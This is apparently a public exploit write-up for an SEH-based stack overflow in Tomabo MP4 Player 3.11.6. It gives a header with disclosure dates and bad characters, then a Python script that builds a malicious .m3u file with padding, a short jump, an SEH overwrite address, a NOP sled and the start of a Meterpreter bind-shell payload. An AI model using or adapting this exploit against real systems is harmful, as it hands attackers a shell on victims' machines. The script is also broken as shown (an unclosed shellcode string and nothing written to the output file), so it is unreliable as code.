# Exploit Title: Tomabo MP4 Player 3.11.6 SEH Based Stack Overflow#
# Exploit Author: @yokoacc, @nudragn, @rungga_reksya#
# Vendor Homepage: http://www.tomabo.com/ #
# Software Link: http://www.tomabo.com/mp4-player/download.html #
# Vulnerable App: Attached#
# Version: 3.11.6 (possibility <= 3.11.6) #
# Tested on: Windows XP, 7, 8, and 8.1#
# Special Thanks to: @OffsecTraining#
# Vendor Notification: August 30th, 2015#
# Fixed Date: Around September 16th, 2015 (didn't response yet) #
# Public Disclosure: October 18th, 2015 #
# How to: Run the code and open the m3u file with the Vulnerable MP4 Player by Tomabo
# Bad Character = '\x00\x09\x0a\x0b\x0c\x0d\x1a\x20'
# Payload= windows/meterpreter/bind_tcp ; PORT=4444
file ="whatever.m3u"
load = "\x41" * 1028
load += "\xeb\x08\x90\x90"
load += "\xA9\x1C\x40\x00"
load += "\x90" * 16
load += ("\xdb\xde\xbd\xbc\x9e\x98\xd8\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
load += "\x44" * (1800 - len(load))
writeFile = open (file, "w")